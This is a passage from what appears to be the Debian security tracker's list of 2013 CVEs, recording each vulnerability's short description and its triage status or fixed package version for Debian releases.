CVE-2013-0520 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...)
	NOT-FOR-US: IBM
CVE-2013-0519 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...)
	NOT-FOR-US: IBM
CVE-2013-0518 (IBM Sterling Secure Proxy 3.2.0 and 3.3.01 before 3.3.01.23 Interim Fi ...)
	NOT-FOR-US: IBM
CVE-2013-0517 (A Command Execution Vulnerability exists in IBM Sterling External Auth ...)
	NOT-FOR-US: IBM
CVE-2013-0516
	REJECTED
CVE-2013-0515
	RESERVED
CVE-2013-0514
	RESERVED
CVE-2013-0513 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 and IBM Rationa ...)
	NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester
CVE-2013-0512 (Stack-based buffer overflow in the Manual Explore browser plug-in for ...)
	NOT-FOR-US: IBM Security AppScan Enterprise, Rational Policy Tester
CVE-2013-0511 (Multiple SQL injection vulnerabilities in IBM Security AppScan Enterpr ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0510 (IBM Security AppScan Enterprise 5.6 and 8.x before 8.7 includes a secu ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0509 (Buffer overflow in the Transaction MIB agent in IBM Tivoli Netcool Sys ...)
	NOT-FOR-US: IBM
CVE-2013-0508 (Multiple buffer overflows in IBM Tivoli Netcool System Service Monitor ...)
	NOT-FOR-US: IBM
CVE-2013-0507 (IBM InfoSphere Information Server 8.1, 8.5, 8.7, 9.1 has a Session Fix ...)
	NOT-FOR-US: IBM
CVE-2013-0506 (Cross-site scripting (XSS) vulnerability in IBM Sterling Order Managem ...)
	NOT-FOR-US: IBM Sterling Order Management
CVE-2013-0505 (IBM Sterling Order Management 8.0 before HF127, 8.5 before HF89, 9.0 b ...)
	NOT-FOR-US: IBM Sterling Order Management
CVE-2013-0504 (Buffer overflow in the broker service in Adobe Flash Player before 10. ...)
	NOT-FOR-US: Adobe Flash Plugin
CVE-2013-0503 (Cross-site scripting (XSS) vulnerability in the Bookmarks component in ...)
	NOT-FOR-US: IBM Lotus Connections
CVE-2013-0502 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Information ...)
	NOT-FOR-US: IBM InfoSphere Information Server
CVE-2013-0501 (The EdrawSoft EDOFFICE.EDOfficeCtrl.1 ActiveX control, as used in Edra ...)
	NOT-FOR-US: IBM Cognos Disclosure Management
CVE-2013-0500 (IBM Storwize V7000 Unified 1.3.x and 1.4.x before 1.4.2.0 does not pro ...)
	NOT-FOR-US: IBM Storwize V7000 Unified
CVE-2013-0499 (Cross-site scripting (XSS) vulnerability in the echo functionality on ...)
	NOT-FOR-US: IBM
CVE-2013-0498
	RESERVED
CVE-2013-0497
	RESERVED
CVE-2013-0496
	RESERVED
CVE-2013-0495
	RESERVED
CVE-2013-0494 (IBM Sterling B2B Integrator 5.0 and 5.1 allows remote attackers to cau ...)
	NOT-FOR-US: IBM Sterling Integrator
CVE-2013-0493
	RESERVED
CVE-2013-0492 (Cross-site scripting (XSS) vulnerability in IBM Informix Open Admin To ...)
	NOT-FOR-US: IBM Informix
CVE-2013-0491
	RESERVED
CVE-2013-0490 (Unspecified vulnerability in IBM InfoSphere Guardium S-TAP 8.1 for DB2 ...)
	NOT-FOR-US: IBM InfoSphere Guardium
CVE-2013-0489 (Cross-site request forgery (CSRF) vulnerability in webadmin.nsf (aka t ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0488 (Cross-site scripting (XSS) vulnerability in webadmin.nsf (aka the Web ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0487 (The Java Console in IBM Domino 8.5.x allows remote authenticated users ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0486 (Memory leak in the HTTP server in IBM Domino 8.5.x allows remote attac ...)
	NOT-FOR-US: IBM Domino
CVE-2013-0485 (Unspecified vulnerability in IBM Java SDK 7 before SR4-FP1, 6 before S ...)
	NOT-FOR-US: IBM Java SDK
CVE-2013-0484 (The server process in IBM Cognos TM1 10.1.x before 10.1.1 FP1 allows r ...)
	NOT-FOR-US: IBM Cognos TM1
CVE-2013-0483 (The login component in SOAP Gateway in IBM IMS Enterprise Suite 1.1, 2 ...)
	NOT-FOR-US: IBM IMS Enterprise Suite
CVE-2013-0482 (IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.29, 8.0 before ...)
	NOT-FOR-US: IBM
CVE-2013-0481 (The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling Fi ...)
	NOT-FOR-US: IBM
CVE-2013-0480
	RESERVED
CVE-2013-0479 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0478 (Cross-site scripting (XSS) vulnerability in IBM InfoSphere Master Data ...)
	NOT-FOR-US: IBM
CVE-2013-0477 (Multiple cross-site scripting (XSS) vulnerabilities in IBM InfoSphere ...)
	NOT-FOR-US: IBM
CVE-2013-0476 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0475 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0474 (The Manual Explore browser plug-in in IBM Security AppScan Enterprise ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0473 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Security Ap ...)
	NOT-FOR-US: IBM Security AppScan Enterprise
CVE-2013-0472 (The Web GUI in the client in IBM Tivoli Storage Manager (TSM) 6.3 befo ...)
	NOT-FOR-US: IBM
CVE-2013-0471 (The traditional scheduler in the client in IBM Tivoli Storage Manager ...)
	NOT-FOR-US: IBM
CVE-2013-0470 (HTTPD in IBM Netezza Performance Portal 1.0.2 allows remote authentica ...)
	NOT-FOR-US: IBM
CVE-2013-0469
	RESERVED
CVE-2013-0468 (Cross-site scripting (XSS) vulnerability in IBM Sterling B2B Integrato ...)
	NOT-FOR-US: IBM
CVE-2013-0467 (IBM Eclipse Help System (IEHS), as used in IBM Data Studio 3.1 and 3.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0466 (Cross-site scripting (XSS) vulnerability in IBM WebSphere Message Brok ...)
	NOT-FOR-US: IBM
CVE-2013-0465 (Unspecified vulnerability in the IBM WebSphere Cast Iron physical and ...)
	NOT-FOR-US: IBM
CVE-2013-0464 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Eclipse Hel ...)
	NOT-FOR-US: IBM
CVE-2013-0463 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0462 (Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6. ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0461 (Cross-site scripting (XSS) vulnerability in the virtual member manager ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0460 (Cross-site request forgery (CSRF) vulnerability in the portlet subsyst ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0459 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0458 (Cross-site scripting (XSS) vulnerability in the Administrative console ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2013-0457 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Managemen ...)
	NOT-FOR-US: IBM
CVE-2013-0456 (IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 ...)
	NOT-FOR-US: IBM
CVE-2013-0455 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Sterling B2 ...)
	NOT-FOR-US: IBM
CVE-2013-0454 (The SMB2 implementation in Samba 3.6.x before 3.6.6, as used on the IB ...)
	- samba 2:3.6.6-1
	[squeeze] - samba (only Samba 3.6.0 - 3.6.5 (inclusive) affected)
	NOTE: https://www.samba.org/samba/security/CVE-2013-0454
CVE-2013-0453 (Cross-site scripting (XSS) vulnerability in Web Reports in IBM Tivoli ...)
	NOT-FOR-US: IBM Tivoli Endpoint Manager
CVE-2013-0452 (Cross-site request forgery (CSRF) vulnerability in the Software Use An ...)
	NOT-FOR-US: IBM Tivoli Endpoint Manager
CVE-2013-0451 (SQL injection vulnerability in IBM Maximo Asset Management 6.2 through ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2013-0450 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0449 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0448 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-0447 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0446 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0445 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12.1-1
	- openjdk-7 7u17-2.3.8-1
	NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69
	NOTE: openjdk-7 fixed in experimental: 7u13-2.3.6-1
CVE-2013-0444 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 7u3-2.1.6-1
	NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/ce04db4aba39
CVE-2013-0443 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0442 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
	NOTE: icedtea fix: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/6527ae06da69
CVE-2013-0441 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0440 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0439 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0438 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0437 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0436 (Unspecified vulnerability in the JavaFX component in Oracle Java SE Ja ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0435 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0434 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0433 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0432 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0431 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Only affects Java7)
	- openjdk-7 7u3-2.1.6-1
	NOTE: IcedTea commit: http://icedtea.classpath.org/hg/release/icedtea7-forest-2.3/jdk/rev/b09c28ff798f
CVE-2013-0430 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0429 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0428 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0427 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0426 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0425 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0424 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 6b27-1.12-1
	- openjdk-7 7u3-2.1.6-1
CVE-2013-0423 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0422 (Multiple vulnerabilities in Oracle Java 7 before Update 11 allow remot ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u3-2.1.4-1
	NOTE: Exploitable on Linux https://www.openwall.com/lists/oss-security/2013/01/11/1
CVE-2013-0421
	REJECTED
CVE-2013-0420 (Unspecified vulnerability in the VirtualBox component in Oracle Virtua ...)
	- virtualbox 4.1.18-dfsg-2 (bug #698292)
	- virtualbox-ose (Vulnerable code not present)
CVE-2013-0419 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0418 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Outside In
CVE-2013-0417 (Unspecified vulnerability in the Sun Storage Common Array Manager (CAM ...)
	NOT-FOR-US: Sun Storage Common Array Manager
CVE-2013-0416 (Unspecified vulnerability in the Siebel Enterprise Application Integra ...)
	NOT-FOR-US: Oracle Siebel
CVE-2013-0415 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0414 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0413 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0412 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...)
	NOT-FOR-US: Solaris
CVE-2013-0411 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows lo ...)
	NOT-FOR-US: Solaris
CVE-2013-0410 (Unspecified vulnerability in the Agile EDM component in Oracle Supply ...)
	NOT-FOR-US: Oracle Supply Chain
CVE-2013-0409 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2013-0408 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0407 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0406 (Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attac ...)
	NOT-FOR-US: Solaris
CVE-2013-0405 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...)
	NOT-FOR-US: Solaris
CVE-2013-0404 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Solaris
CVE-2013-0403 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 allow ...)
	NOT-FOR-US: Solaris
CVE-2013-0402 (Heap-based buffer overflow in the Java Runtime Environment (JRE) compo ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-0401 (The Java Runtime Environment (JRE) component in Oracle Java SE 7 Updat ...)
	- openjdk-7 7u21-2.3.9-1
	- openjdk-6 6b27-1.12.5-1
CVE-2013-0400 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0399 (Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows local ...)
	NOT-FOR-US: Solaris
CVE-2013-0398 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows re ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-0397 (Unspecified vulnerability in the Oracle Applications Framework compone ...)
	NOT-FOR-US: Oracle Applications Framework
CVE-2013-0396 (Unspecified vulnerability in the Application Performance Management (A ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0395 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0394 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle P ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0393 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Outside In
CVE-2013-0392 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0391 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0390 (Unspecified vulnerability in the Oracle Applications Framework compone ...)
	NOT-FOR-US: Oracle Applications Framework
CVE-2013-0389 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...)
	{DSA-2780-1}
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0388 (Unspecified vulnerability in the PeopleSoft HRMS component in Oracle P ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0387 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0386 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0385 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...)
	{DSA-2780-1}
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0384 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...)
	{DSA-2780-1}
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0383 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...)
	{DSA-2780-1}
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0382 (Unspecified vulnerability in the Oracle Marketing component in Oracle ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-0381 (Unspecified vulnerability in the Oracle CRM Technical Foundation compo ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-0380 (Unspecified vulnerability in the Oracle Payroll component in Oracle E- ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-0379 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0378 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0377 (Unspecified vulnerability in the Oracle Applications Technology Stack ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-0376 (Unspecified vulnerability in the Oracle Applications Framework compone ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-0375 (Unspecified vulnerability in the Server component in Oracle MySQL 5.1. ...)
	{DSA-2780-1}
	- mysql-5.1 5.1.67
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0374 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0373 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0372 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager
CVE-2013-0371 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0370 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...)
	NOT-FOR-US: Oracle Supply Chain product suite
CVE-2013-0369 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0368 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0367 (Unspecified vulnerability in the Server component in Oracle MySQL 5.5. ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2013-0366 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0365 (Unspecified vulnerability in the Siebel CRM component in Oracle Siebel ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-0364 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0363 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0362 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0361 (Unspecified vulnerability in the Mobile Server component in Oracle Dat ...)
	NOT-FOR-US: Oracle Database Mobile/Lite Server
CVE-2013-0360 (Unspecified vulnerability in the Application Performance Management (A ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0359 (Unspecified vulnerability in the APM - Application Performance Managem ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0358 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0357 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0356 (Unspecified vulnerability in the PeopleSoft PeopleTools component in O ...)
	NOT-FOR-US: Oracle PeopleSoft
CVE-2013-0355 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0354 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0353 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0352 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...)
	NOT-FOR-US: Oracle Enterprise Manager Grid Control
CVE-2013-0351 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-0350 (tmp_smtp.c in pktstat 1.8.5 allows local users to overwrite arbitrary ...)
	- pktstat 1.8.5-3 (bug #701211)
	[squeeze] - pktstat (Vulnerable code not present)
CVE-2013-0349 (The hidp_setup_hid function in net/bluetooth/hidp/core.c in the Linux ...)
	{DSA-2668-1}
	- linux 3.2.39-1
	- linux-2.6
CVE-2013-0348 (thttpd.c in sthttpd before 2.26.4-r2 and thttpd 2.25b use world-readab ...)
	- thttpd (low)
	[squeeze] - thttpd (Minor issue)
	NOTE: http://blogs.gentoo.org/blueness/2014/10/03/sthttpd-a-very-tiny-and-very-fast-http-server-with-a-mature-codebase/
CVE-2013-0347 (The Gentoo init script for webfs uses world-readable permissions for / ...)
	- webfs 1.21+ds1-9 (low; bug #701638)
	[wheezy] - webfs (Minor issue)
	[squeeze] - webfs (Minor issue)
CVE-2013-0346 (** DISPUTED ** Apache Tomcat 7.x uses world-readable permissions for t ...)
	- tomcat6 (Log files are owned by tomcat:tomcat)
CVE-2013-0345 (varnish 3.0.3 uses world-readable permissions for the /var/log/varnish ...)
	- varnish (Logfiles are owned by varnishlog:varnishlog)
CVE-2013-0344
	RESERVED
CVE-2013-0343 (The ipv6_create_tempaddr function in net/ipv6/addrconf.c in the Linux ...)
	{DSA-2906-1}
	- linux 3.10.11-1 (low)
	[wheezy] - linux 3.2.51-1
	- linux-2.6 (low)
CVE-2013-0342 (The CreateID function in packet.py in pyrad before 2.1 uses sequential ...)
	- pyrad (low; bug #701151)
	[bullseye] - pyrad (Minor issue)
	[buster] - pyrad (Minor issue)
	[stretch] - pyrad (Minor issue)
	[jessie] - pyrad (Minor issue)
	[wheezy] - pyrad (Minor issue)
	[squeeze] - pyrad (Minor issue)
	NOTE: Originally reported together with #700669 (CVE-2013-0294)
CVE-2013-0341 [external entity expansion]
	REJECTED
CVE-2013-0340 (expat 2.1.0 and earlier does not properly handle entities expansion un ...)
	- expat (unimportant)
	NOTE: Expat provides an API to mitigate expansion attacks; mitigation is ultimately under the control of the application using Expat
	NOTE: https://people.canonical.com/~ubuntu-security/cve/2013/CVE-2013-0340.html
CVE-2013-0339 (libxml2 through 2.9.1 does not properly handle external entities expan ...)
	{DSA-2652-1}
	- libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260)
CVE-2013-0338 (libxml2 2.9.0 and earlier allows context-dependent attackers to cause ...)
	{DSA-2652-1}
	- libxml2 2.8.0+dfsg1-7+nmu1 (bug #702260)
CVE-2013-0337 (The default configuration of nginx, possibly 1.3.13 and earlier, uses ...)
	- nginx (low; bug #701112)
	[bullseye] - nginx (Minor issue)
	[buster] - nginx (Minor issue)
	[stretch] - nginx (Minor issue)
	[jessie] - nginx (Minor issue)
	[wheezy] - nginx (Minor issue)
	[squeeze] - nginx (Minor issue)
	NOTE: Can only be fixed properly once https://trac.nginx.org/nginx/ticket/376 is resolved upstream
	NOTE: Originally fixed in 1.4.4-2 but reintroduced with DSA-3701-1 (CVE-2016-1247)
	NOTE: Post DSA-3701-1, Debian's default configuration is not affected, but newly created log files are
CVE-2013-0336 (The ipapwd_chpwop function in daemons/ipa-slapi-plugins/ipa-pwd-extop/ ...)
	- 389-ds-base 1.3.2.9-1 (bug #704077)
CVE-2013-0335 (OpenStack Compute (Nova) Grizzly, Folsom (2012.2), and Essex (2012.1) ...)
	- nova 2012.1.1-14 (bug #701773)
CVE-2013-0334 (Bundler before 1.7, when multiple top-level source lines are used, all ...)
	- bundler 1.7.2-1 (low; bug #762739)
	[wheezy] - bundler (Minor issue)
CVE-2013-0333 (lib/active_support/json/backends/yaml.rb in Ruby on Rails 2.3.x before ...)
	{DSA-2613-1}
	- rails 2.3.14.1 (bug #699226)
	- ruby-activesupport-2.3 2.3.14-6 (bug #699249)
	NOTE: Starting with 2.3.14.1 rails is a transitional package
	NOTE: https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/1h2DR63ViGo
CVE-2013-0332 (Multiple directory traversal vulnerabilities in ZoneMinder 1.24.x befo ...)
	{DSA-2640-1}
	- zoneminder 1.25.0-1 (bug #700912)
CVE-2013-0331 (Jenkins before 1.502 and LTS before 1.480.3 allows remote authenticate ...)
	- jenkins 1.480.3+dfsg-1 (bug #700761)
CVE-2013-0330 (Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480 ...)
	- jenkins 1.480.3+dfsg-1 (bug #700761)
CVE-2013-0329 (Unspecified vulnerability in Jenkins before 1.502 and LTS before 1.480 ...)
	- jenkins 1.480.3+dfsg-1 (bug #700761)
CVE-2013-0328 (Cross-site scripting (XSS) vulnerability in Jenkins before 1.502 and L ...)
	- jenkins 1.480.3+dfsg-1 (bug #700761)
CVE-2013-0327 (Cross-site request forgery (CSRF) vulnerability in Jenkins master in J ...)
	- jenkins 1.480.3+dfsg-1 (bug #700761)
CVE-2013-0326 (OpenStack nova base images permissions are world readable ...)
	- nova (unimportant)
	NOTE: Unfixed upstream; a typical installation is not multi-user anyway
CVE-2013-0325 (Multiple cross-site scripting (XSS) vulnerabilities in the Varnish mod ...)
	NOT-FOR-US: Drupal addon
CVE-2013-0324 (Cross-site scripting (XSS) vulnerability in the Rendered links formatt ...)
